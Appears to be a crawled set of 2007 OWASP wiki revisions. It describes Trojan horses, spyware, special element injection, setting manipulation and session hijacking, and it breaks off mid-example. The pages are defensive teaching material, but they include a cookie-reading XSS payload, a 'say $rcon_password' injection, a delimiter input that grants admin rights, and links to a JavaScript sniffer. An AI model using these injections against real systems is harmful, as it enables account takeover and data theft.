[[:Category:Information Disclosure]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Path Traversal]]<br />
*[[Embedding Null Code]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation]]<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Input Validation]]<br />
<br />
<br />
[[Category:Resource Manipulation]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Trojan_Horse&diff=23093Trojan Horse2007-11-05T17:53:38Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
A Trojan horse is a program that uses malicious code masqueraded as a benign application. The term derives from the myth of the Greek Trojan Horse on the Trojan War. The malicious code can be injected on legitimate software to be installed by victim, or the supposed benign program itself can be the Trojan horse. The victim is usually tricked to open the Trojan horse because it appears to be received from a legitimate source.<br />
This kind of malware looks and acts like a virus, but the difference resides on the fact that Trojan horse does not self-replicate. The infected computer experience many different symptoms similar to virus, as background configuration auto changing, mouse buttons function reversing, system crashes, the famous blue screen, computer reboots itself, Ctrl + Alt + Del stops working, and many other symptoms described later in this document.<br />
The ultimate Trojan horse uses javascript to make furtive attack, free of antimalware intervention and users interception, normally used on attacks against internet banking transactions on-the-fly, resulting victim´s financial loss. <br />
<br />
Other details can be found on [[Man-in-the-browser attack]].<br />
<br />
'''The 7 main types of Trojan Horse'''<br />
<br />
1.Remote Access Trojan (RAT)<br />
<br />
Designed to provide the attacker full control of the infected machine. Trojan horse usually masqueraded as a utility. <br />
<br />
2.Data Sending Trojan<br />
<br />
Trojan horse that uses keylogger technology to capture sensitive data like passwords, credit card and banking information, IM messages, and send back to attacker.<br />
<br />
3.Destructive Trojan<br />
<br />
Trojan horse designed to destroy data stored on victim’s computer.<br />
<br />
4.Proxy Trojan<br />
<br />
Trojan horse that uses the victim´s computer as a proxy server, providing attacker opportunity to execute illicit acts from the infected computer, like banking fraud, and even malicious attacks over the internet.<br />
<br />
5.FTP Trojan<br />
<br />
This type of Trojan horse uses the port 21 to enable the attackers to connect to the victim´s computer using File Transfer Protocol.<br />
<br />
6.Security software disabler Trojan<br />
<br />
The Trojan horse is designed to disable security software like firewall and antivirus, enabling the attacker to use many invasion techniques to invade the victim´s computer, and even to infect more the computer.<br />
<br />
7.Denial-of-Service attack Trojan<br />
<br />
Trojan horse designed to give the attacker opportunity to realize Denial-of-Service attacks from victim´s computer.<br />
<br />
'''Symptoms'''<br />
<br />
A list of common symptoms is described in this section.<br />
<br />
•Wallpaper and other background settings auto changing<br />
<br />
•Internet browser display unknown web sites<br />
<br />
•Mouse pointer disappear<br />
<br />
•Sound volume auto changing<br />
<br />
•Buttons, shortcuts and other basic resources disappear<br />
<br />
•Programs auto loading and unloading<br />
<br />
•Strange windows warnings, messages and question box, and options being displayed constantly<br />
<br />
•e-mail client auto sending messages to all user´s contacts list<br />
<br />
•Windows auto closing<br />
<br />
•System auto rebooting<br />
<br />
•Internet accounts information changing<br />
<br />
•High internet bandwidth being used without user action<br />
<br />
•Computer´s high resources consumption (computer slows down)<br />
<br />
•Popup with adult content or illegal references appearing without user action<br />
<br />
•Ctrl + Alt + Del stops working<br />
<br />
•Other users connected to the computer<br />
<br />
•Documents being sent to the printer without user action<br />
<br />
•DVD/CD drive´s drawer auto opening and closing<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to High<br />
<br />
==Examples==<br />
<br />
A Javascript Trojan Horse example can be found on: http://www.attacklabs.com/download/sniffer.rar .<br />
<br />
An iframe pointing to a javascript which downloads malware: http://isc.sans.org/diary.html?storyid=2923&dshield=4c501ba0d99f5168ce114d3a3feab567<br />
<br />
== External References==<br />
<br />
*[[http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-prrof-of-concept.html | Ajax Sniffer]]<br />
<br />
*[[http://hacker-eliminator.com/trojansymptoms.html | Trojan Infection Symptoms]]<br />
<br />
*[[http://www.webopedia.com/DidYouKnow/Internet/2004/virus.asp | The Difference Between a Virus, Worm and Trojan Horse]]<br />
<br />
==Related Threats==<br />
<br />
*[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
<br />
* [[Spyware]]<br />
* [[Phishing]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
TBD<br />
<br />
==Related Countermeasures==<br />
<br />
TBD<br />
<br />
<br />
[[Category:Malicious Code Attack]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Spyware&diff=23090Spyware2007-11-05T17:47:00Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
The spyware is a program that captures statistic information from user´s computer and sends it over internet without user acceptance. This information is usually obtained from cookies and web browser’s history. The spyware can also install other software, display advertisement, or redirect the web browser activity.<br />
A spyware differs from virus, worm and adware from various ways. The spyware does not self-replicate and distribute like virus and worm, and not necessarily displays advertisements like adware. The common characteristics between spyware and virus, worm, and adware are:<br />
<br />
1. exploitation of infected computer for commercial purposes<br />
<br />
2. the display, in some cases, of advertisements<br />
<br />
The spyware is usually masqueraded or presented as an utility software like P2P client, optimization tool, web accelerator, download accelerator, and even as security software like antispyware. In this case the user infects the computer by installing this kind of software without being aware of the danger. The spyware can also be bundled in media and shareware, being additionally installed with the software or autorun. The infection can occurs through fake Windows warning, when the fake message appears warning the user about some security issue or offering performance optimizing.<br />
The computer infected presents symptoms like poor performance due to high memory and processor usage, unwanted behavior, system crash, high internet bandwidth usage, large number of popup, and many other symptoms.<br />
The biggest problem is that the infected computer becomes extremely vulnerable to many other spywares, which install themselves into the computer.<br />
<br />
== Severity ==<br />
<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
<br />
Very High<br />
<br />
==Example ==<br />
<br />
<center><br />
<br />
https://www.owasp.org/images/6/68/Figura2.jpg<br />
<br />
Figure 1. A lot of toolbars added by spyware, and some working as spyware<br />
</center><br />
<br />
==External References==<br />
<br />
*http://cwe.mitre.org/data/definitions/506.html - Malicious<br />
<br />
==Related Threats==<br />
<br />
*[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
<br />
* [[Trojan Horse]]<br />
* [[Phishing]]<br />
* [[:Category:Malicious Code Attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
TBD<br />
<br />
==Related Countermeasures==<br />
<br />
TBD<br />
<br />
[[Category:Resource Manipulation]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Special_Element_Injection&diff=23089Special Element Injection2007-11-05T17:32:58Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
Special Element Injection is a type of injection attack that exploits weakness related to reserved words and special character.<br />
<br />
Every programming language and operational system has special characters considered as reserved words for it. However, when an application receives such data as user input, it is possible to observe unexpected behavior in the application when parsing this information. This can lead to information disclosure, access control and authorization bypass, code injection, and many other variants.<br />
<br />
According to the characters used, the Special Element Injection attack can be performed using macro symbol, parameter delimiter and null character/null byte, among others. <br />
<br />
== Severity ==<br />
<br />
Medium to High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium <br />
<br />
==Examples ==<br />
<br />
=== Example 1 - Macro symbol ===<br />
<br />
The Special Element Injection attack based on macro symbol can be performed by inserting macro symbols in input fields or user configuration files. A known example of this attack can be represented by vulnerability exploitation on Quake II server 3.20 and 3.21. This vulnerability allows remote user to access server console variables (cvar), directory lists and execute admin commands by client on the Quake II Server. <br />
<br />
On this application, cvars are used by client and server to store configurations and status information. A cvar can be accessed by “$name” syntax, where “name” is the name of the console variable to be expanded. <br />
<br />
However, it is possible to modify the client console to send a malicious command to the server, such as “say $rcon_password” to attempt discovering the content server $rcon_password variables.<br />
<br />
By discovering the password, it is possible to perform further actions on the server, like discover directories structures, command execution and visualization of files contents.<br />
<br />
=== Example 2 - Parameter delimiter ===<br />
<br />
Parameter Delimiter is another variant of Special Element Injection. In order to illustrate how this attack can be performed, it’ll be used a vulnerability found on PHP posting system Poster version.two. <br />
<br />
This application has a dangerous vulnerability that allows data insertion into fields (username, password, email address and privileges) of the “mem.php” file. This file is responsible for managing application users.<br />
<br />
An example of “mem.php” file is shown bellow, where user Jose has admin privileges and Alice has just user access:<br />
<br />
<?<br />
Jose|12345678|jose@attack.com|admin|<br />
Alice|87654321|alice@attack.com|normal|<br />
?><br />
<br />
When a user wants to edit his profile, he must use edit account” option in the “index.php” page and enter his login information. However, using “|” as a parameter delimiter on email field followed by “admin” profile, the user could elevate her privileges to administrator. Example:<br />
<br />
Username: Alice<br />
Password: 87654321<br />
Email: alice@attack.com |admin| <br />
<br />
This information will be recorded in “mem.php” file like this: <br />
<br />
Alice|87654321|alice@attack.com|admin|normal|<br />
<br />
The next time user Alice logs in, the application will acquire the parameter “|admin|” as user profile, thus elevating her privileges to administrator profile.<br />
<br />
==External References==<br />
<br />
http://cwe.mitre.org/data/definitions/75.html - Special Element Injection (75)<br />
<br />
http://cwe.mitre.org/data/definitions/76.html - Equivalent Special Element Injection (76)<br />
<br />
http://cwe.mitre.org/data/definitions/141.html - Parameter Delimiter(141)<br />
<br />
http://cve.mitre.org/docs/plover/SECTION.9.3.html - PLOVER: SECTION.9.3. – Special Elements (Characters or Reserved Words)<br />
<br />
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0770 - Quake II Server Vulnerability<br />
<br />
http://www.kb.cert.org/vuls/id/970915 - Quake II Server performs console variable expansion on client-supplied input values<br />
<br />
http://archives.neohapsis.com/archives/bugtraq/2002-05/0118.html - Quaker II Server problem<br />
<br />
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307 - Attacker inserts field separator into input to specify admin privileges<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Command Execution]]<br />
<br />
[[:Category: Authorization]]<br />
<br />
==Related Attacks==<br />
[[:Category:Injection Attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category: Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category: Input Validation Vulnerability]]<br />
<br />
<br />
[[Category:Injection]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Setting_Manipulation&diff=23088Setting Manipulation2007-11-05T17:26:26Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
This attack aims to modify application settings in order to cause data misleading or advantages on user behalf. He may manipulate values in the system and manages specific resources user by application or affects its functionalities.<br />
<br />
An attacker can exploit several functionalities of the application using this attack technique, but it would not possible to describe all the ways of exploration, due to innumerable options that attacker may use to control the system values. <br />
<br />
Using this attack technique, it is possible to manipulate settings by changing the application functions, such as calls to the database, blocking access to external libraries and/or modification log files.<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to Low<br />
<br />
==Example==<br />
<br />
===Example 1 ===<br />
<br />
An attacker needs to identify the variables without input validation or improperly encapsulated to obtain success in the attack.<br />
<br />
The following example was based on the ones found in the Individual CWE Dictionary Definition (Setting Manipulation-15). <br />
<br />
Consider the following piece of Java code:<br />
…<br />
conn.setCatalog(request.getParameter(“catalog”));<br />
...<br />
<br />
This fragment reads the string “catalog” from “HttpServletRequest” and sets it as the active catalog for a database connection. An attacker could manipulate this information and cause connection error or unauthorized access to other catalogs.<br />
<br />
<br />
===Example 2 – Block Access to Libraries ===<br />
<br />
The attacker has the privileges to block application access to external libraries to execute this attack. It is necessary discover what external libraries are accessed by application and block it. The attacker needs to observe if behavior of the system goes into an insecure/inconsistent state.<br />
<br />
In this case the application uses a third party cryptographic random number generation library that used in generation of user session ids. An attacker may block to access this library by renaming it.<br />
Then an application will be use the weak pseudo random number generation library. The attacker can use this weakness to predict the session id user, he/she attempts to perform elevation of privilege escalation and gains access user’s account. <br />
<br />
For more details about this attack, see:<br />
http://capec.mitre.org/data/definitions/96.html<br />
<br />
==External References==<br />
<br />
http://cwe.mitre.org/data/definitions/15.html - Setting Manipulation<br />
<br />
http://capec.mitre.org/data/definitions/13.html - Subverting Environment Variable Values<br />
<br />
http://capec.mitre.org/data/definitions/96.html - Block Access to Libraries<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Logical Attacks]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Denial of Service]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
* [[:Category:Input General Logic Error Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
*[[:Category: Error Handling]]<br />
<br />
<br />
[[Category: Resource Manipulation]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&diff=23087SpoC 007 - Attacks Reference Guide - Progress Page2007-11-05T17:25:30Z<p>Nsrav: /* Work Done */</p>
<hr />
<div>[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] <br />
<br />
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]<br />
<br />
<br />
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:<br />
<br />
# Attack list revision and description (75% of the project)<br />
# Attacks categorization (40% of the project)<br />
# Research and describe new attacks (80% of the project)<br />
<br />
Total project status: '''90% Done!'''<br />
<br />
== CheckPoints and Decision ==<br />
<br />
===Phase 1 - 90% Done ===<br />
* Attack List Revision: '''Done!'''<br />
Total number of items on the Attack Guide: '''91'''!<br />
<br />
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.<br />
<br />
Items considered to removal from the attack list: '''30 items''', as follows:<br />
<br />
**[[API_Abuse]]<br />
**[[Cross_Site_Scripting]]<br />
**[[Cross-Site_Scripting]]<br />
**[[CSRF]]<br />
**[[Internal_software_developer]]<br />
**[[Interpreter_Injection]]<br />
**[[Link_Following]]<br />
**[[Log_forging]]<br />
**[[Logic/time_bomb]]<br />
**[[Macro_symbol]]<br />
**[[Network_amplification]]<br />
**[[One-Click_Attack]]<br />
**[[OS_Injection]]<br />
**[[OS_Command_Injection]]<br />
**[[PRNG_permanent_compromise_attack]]<br />
**[[Reviewing_Code_for_OS_Injection]]<br />
**[[Script_in_IMG_tags]]<br />
**[[Sniffing_application_traffic_attack]]<br />
**[[Template:Attack]]<br />
**[[Unquoted_Search_Path_or_Element]]<br />
**[[Web_problems]]<br />
**[[Wildcard_or_Matching_Element]]<br />
**[[Windows_::DATA_alternate_data_stream]]<br />
**[[Windows_hard_link]]<br />
**[[Windows_MS-DOS_device_names]]<br />
**[[Windows_Path_Link_problems]]<br />
**[[Windows_Shortcut_Following_%28.LNK%29]]<br />
**[[Windows_Virtual_File_problems]]<br />
**[[XSS_Attacks]]<br />
**[[XSRF]]<br />
<br />
* Attacks Description: '''48 of 59 items done'''!<br />
* Attacks and content just reviewed '''2 items'''!<br />
**[[HTTP_Response_Splitting]]<br />
**[[SQL_Injection]]<br />
<br />
===Phase 2 - DONE! ===<br />
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. <br />
<br />
The categories defined are:<br />
* [[:Category:Abuse of Functionality]]<br />
* [[:Category:Spoofing]]<br />
* [[:Category:Probabilistic Techniques]]<br />
* [[:Category:Exploitation of Authentication]]<br />
* [[:Category:Resource Depletion]]<br />
* Exploitation of Privilege/Trust<br />
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)<br />
* [[:Category:Data_Structure_Attacks]]<br />
* Data Leakage Attacks<br />
* [[:Category:Resource Manipulation]]<br />
* Protocol Manipulation<br />
* Time and State Attacks<br />
<br />
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.<br />
<br />
===Phase 3 ===<br />
Research and Description of new attacks(under revision):<br />
<br />
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]<br />
** [[Buffer_Overflow_via_Environment_Variables]]<br />
** [[Cross_Frame_Scripting]]<br />
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Overflow_Binary_Resource_File]]<br />
** [[Session_Prediction]]<br />
<br />
=== Work Done ===<br />
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file<br />
<br />
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).<br />
<br />
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&diff=23056&oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&action=history history])<br />
<br />
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&diff=23057&oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&action=history history])<br />
<br />
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&diff=23058&oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&action=history history])<br />
<br />
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&diff=23060&oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&action=history history])<br />
<br />
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&diff=23065&oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&action=history history])<br />
<br />
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&diff=23067&oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&action=history history])<br />
<br />
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23075&oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&action=history history])<br />
<br />
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&diff=23077&oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&action=history history history])<br />
<br />
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&diff=23079&oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&action=history history])<br />
<br />
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&diff=23082&oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&action=history history])<br />
<br />
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&diff=23084&oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&action=history history])<br />
<br />
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&diff=22073&oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&action=history history])<br />
<br />
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&diff=20667&oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&action=history history])<br />
<br />
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&diff=20873&oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&action=history history])<br />
<br />
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&diff=22728&oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&action=history history])<br />
<br />
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&diff=20794&oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&action=history history])<br />
<br />
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&diff=20886&oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&action=history history])<br />
<br />
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&diff=22733&oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&action=history history])<br />
<br />
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&diff=22734&oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&action=history history])<br />
<br />
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&diff=20884&oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&action=history history])<br />
<br />
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&diff=22761&oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&action=history history])<br />
<br />
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&diff=22775&oldid=7392 diff] , [https://www.owasp.org/index.php?title=Traffic_flood&action=history history])<br />
<br />
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&diff=22756&oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&action=history history])<br />
<br />
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&diff=22729&oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&action=history history])<br />
<br />
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&diff=20883&oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&action=history history])<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])<br />
<br />
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&diff=22637&oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&action=history history])<br />
<br />
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&diff=22638&oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&action=history history])<br />
<br />
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&diff=22641&oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&action=history history])<br />
<br />
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&diff=22642&oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&action=history history])<br />
<br />
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&diff=22647&oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&action=history history])<br />
<br />
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&diff=22651&oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&action=history history])<br />
<br />
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&diff=22654&oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&action=history history])<br />
<br />
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&diff=22643&oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&action=history history])<br />
<br />
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&diff=22658&oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&action=history history])<br />
<br />
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&diff=22660&oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&action=history history])<br />
<br />
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&diff=22661&oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&action=history history])<br />
<br />
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&diff=22662&oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&action=history history])<br />
<br />
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])<br />
<br />
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&diff=22954&oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&action=history history])<br />
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&diff=22956&oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&action=history history])<br />
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&diff=22957&oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&action=history history])<br />
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&diff=22959&oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&action=history history])<br />
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&diff=22960&oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&action=history history])<br />
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&diff=22961&oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&action=history history])<br />
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&diff=22962&oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&action=history history])<br />
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&diff=22963&oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&action=history history])<br />
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&diff=22965&oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&action=history history])<br />
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&diff=22936&oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&action=history history])<br />
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&diff=22937&oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&action=history history])<br />
<br />
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):<br />
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&action=history history])<br />
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&action=history history])<br />
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&action=history history])</div>Nsravhttps://wiki.owasp.org/index.php?title=Session_hijacking_attack&diff=23086Session hijacking attack2007-11-05T17:22:00Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
The session hijack attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. <br />
<br />
Because a http communication use many different TCP connection, the web server need a method to recognize every user’s connections. The most useful method in use, depends on a token that the Web Server send to the client browser after a successful client authentication. A session token is normally composed by a string of variable width and it could be used indifferent ways, like: in the URL, in the header of the http requisition as a cookie or in the other parts of the header of the http request or yet in the body of the http requisition.<br />
<br />
The Session Hijacking attack compromise the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.<br />
<br />
The session token could be compromised in different ways, the most common are:<br />
<br />
• Predictable session token;<br />
<br />
• Session Sniffing;<br />
<br />
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);<br />
<br />
• Man-in-the-middle attacks.<br />
<br />
• Man-in-the-browser attacks<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Very High<br />
<br />
==Examples ==<br />
<br />
===Example 1===<br />
====Session Sniffing====<br />
<br />
In the example as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”, then he uses the valid token session to gain unauthorized access to the Web Server. <br />
<br />
<br />
<center><br />
[[Image:Session_Hijacking_3.JPG]] <br />
<br />
Figure 2. Manipulating the token session executing the session hijacking attack.<br />
</center><br />
<br />
===Example 2===<br />
====Cross-site script attack====<br />
<br />
The attacker can compromise the session token by using malicious code or programs running at the client-side, the example will show how the attacker could use a XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim click on the link, the JavaScript will run and complete the instructions made by the attacker.<br />
The example in figure 3 uses an XSS attack to shows the cookie value of the current session, using the same technique is possible to create a specific Javascript code that will send the cookie to the attacker: <br />
<br />
<SCRIPT>alert(document.cookie);</SCRIPT><br />
<br />
<br />
<center><br />
